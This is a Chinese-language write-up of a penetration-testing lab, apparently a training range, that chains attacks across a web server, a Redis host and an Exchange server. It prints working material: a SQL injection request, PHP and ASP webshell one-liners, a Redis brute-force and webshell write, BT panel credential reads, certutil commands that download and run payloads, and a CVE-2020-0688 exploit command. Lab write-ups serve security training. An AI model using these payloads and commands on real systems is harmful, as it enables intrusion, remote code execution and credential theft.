靶场描述

靶场拓扑图

cncat网络拓扑图.drawio

PS：该靶场作者：暗月

HOSTS设置

cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
# 5-fbi
192.168.0.206 www.cocat.com

WEB服务器

信息收集

端口扫描

sudo nmap -sT -sV -O 192.168.0.206 -p-
Starting Nmap 7.93 ( https://nmap.org ) 
Nmap scan report for www.cocat.cc (192.168.0.206)
Host is up (0.0025s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     FileZilla ftpd
80/tcp   open  http    Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a)
888/tcp  open  http    Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a)
3306/tcp open  mysql   MySQL (unauthorized)
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8888/tcp open  http    Ajenti http control panel
MAC Address: 00:0C:29:DF:81:FA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2012
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
OS details: Microsoft Windows Server 2012 or Windows Server 2012 R2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.78 seconds

目录遍历

dirsearch -u "http://www.cocat.cc" -e php,htm,js,bak,zip,tar.gz,tgz,txt -r -R 1 -i 200-399

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, htm, js, bak, zip, tar.gz, tgz, txt | HTTP method: GET | Threads: 30 | Wordlist size: 12472

Output File: /home/kali/.dirsearch/reports/www.cocat.cc.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.cocat.cc/

[00:08:31] Starting: 
[00:08:38] 200 -   78B  - /Desktop.ini                                    
[00:09:09] 200 -    1KB - /favicon.ico                                    
[00:09:12] 302 -    0B  - /index.php  ->  ./kss_admin/index.php           
[00:09:12] 302 -    0B  - /index.php.  ->  ./kss_admin/index.php          
[00:09:12] 302 -    0B  - /index.php/login/  ->  ./kss_admin/index.php    
[00:09:12] 302 -    0B  - /index.pHp  ->  ./kss_admin/index.php           
[00:09:47] 200 -    2MB - /web.zip                                        

Task Completed

漏洞测试

通过目录扫描拿到源码，然后通过解密，代码审计发现sql注入。

POST /kss_inc/payapi_return2.php HTTP/1.1
Host: www.cocat.cc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ZDEDebuggerPresent=php,phtml,php3; loginimg=BkoEA1odDF4%3D; loginimg_ver=364892bbc0c1067100dc8dc53ba2b1b0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

v_oid=1*&v_pstatus=1&v_amount=1&v_moneytype=1&remark1=1&v_md5str=1

1	sqlmap -r sqli.txt --batch

1	sqlmap -u "www.ddd4.com/search/?keyword=123*" --batch -tamper=chardoubleencode.py -D www_ddd4_com -T doc_user --dump

登录后台，插入一句话。

1	');eval($_POST['abc']);//

输入框字符有限制，bp发送数据包。

宝塔提权

set /p port=<%panel_path%\data\port.pl 				#8888
set /p password=<%panel_path%\data\default.pl   	#jSKyFFdj
set /p admin_path=<%panel_path%\data\admin_path.pl 	#/e1VOsmtO
`C:/BtSoft/panel/data/default.db` 					#gOXZQjWA

用户名在数据库中：C:/BtSoft/panel/data/default.db。

上传CS马执行：

Flag1

C:\Users\Administrator\root.txt

Redis服务器

信息收集

beacon> shell fscan -h 10.10.11.133
[*] Tasked beacon to run: fscan -h 10.10.11.133
[+] host called home, sent: 52 bytes
[+] received output:

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.0
start infoscan
10.10.11.133:6379 open
10.10.11.133:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.133       code:200 len:701    title:IIS Windows Server

Redis爆破

目录遍历没结果，尝试爆破密码。

sudo proxychains hydra redis://10.10.11.133 -P somd5top10w.txt
[sudo] password for kali: 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-18 04:20:16
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100000 login tries (l:1/p:100000), ~6250 tries per task
[DATA] attacking redis://10.10.11.133:6379/
[proxychains] Strict chain  ...  192.168.0.12:24791  ...  10.10.11.133:6379  ...  OK
[proxychains] Strict chain  ...  192.168.0.12:24791 [proxychains] Strict chain  ...  192.168.0.12:24791 [proxychains] Strict chain  ...  192.168.0.12:24791 [proxychains] Strict chain  ...  192.168.0.12:24791 [proxychains] Strict chain  ...  192.168.0.12:24791 [proxychains] Strict chain  ...  192.168.0.12:24791  
[6379][redis] host: 10.10.11.133   password: 123456789qq
[STATUS] attack finished for 10.10.11.133 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished

写入默认IIS网站路径：

proxychains redis-cli -h 10.10.11.133
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.0.12:24791  ...  10.10.11.133:6379  ...  OK
10.10.11.133:6379> auth 123456789qq
OK
10.10.11.133:6379> CONFIG SET dir C:\inetpub\wwwroot
OK
10.10.11.133:6379> CONFIG SET dbfilename a.asp
OK
10.10.11.133:6379> set x ' <%eval request("abc")%> '
OK
10.10.11.133:6379> save
OK

蚁剑文件上传报500错误，上传WEB服务器后通过命令下载，开启端口执行上线。

1
2
3

certutil -urlcache -split -f http://10.10.11.132/sencond.exe

shell netsh advfirewall firewall add rule name=open4431 protocol=TCP localport=4431 dir=in action=allow

SpoolSystem 注入

明文抓取

1	shell netsh advfirewall firewall add rule name=open4413 protocol=TCP localport=4413 dir=in action=allow

Flag2

Exchange服务器

信息收集

fscan扫描结果，209有Outlook Web APP。

查找本地的Outlook文件：

拿到文件后打开有账户密码。

登录账号：

Exchange CVE-2020-0688

CVE-2020-0688-EXP

Ysoserial.exe

1	proxychains python3 cve-2020-0688.py -s https://10.10.12.209/owa/ -u 'cncat\moonsec' -p 'QQqq5201314' -c "cmd /c certutil -urlcache -split -f http://10.10.12.130/third.exe c:/third.exe"